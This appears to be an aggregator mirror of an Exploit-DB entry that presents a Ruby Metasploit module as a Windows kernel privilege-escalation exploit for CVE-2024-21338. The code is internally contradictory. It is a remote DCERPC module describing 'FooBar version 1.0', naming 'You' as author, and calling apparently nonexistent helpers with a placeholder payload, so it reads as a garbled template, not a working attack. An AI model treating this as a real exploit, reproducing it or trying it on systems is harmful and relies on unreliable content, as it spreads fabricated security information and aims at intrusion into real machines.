4
[local] Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
source link: https://www.exploit-db.com/exploits/51946
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
Exploit:
/
#############################################
# Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-21338 Exploit',
'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
'Author' => 'You',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338']
]
)
)
register_options(
[
OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
OptPort.new('RPORT', [true, 'The target port', 1234])
]
)
end
def check
connect
begin
impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
rescue Rex::Post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Appears
end
def exploit
connect
begin
impacket_artifact(
dcerpc_binding('ncacn_ip_tcp'),
'FooBar',
datastore['FooBarPayload']
)
rescue Rex::Post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
end
handler
disconnect
end
end
#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK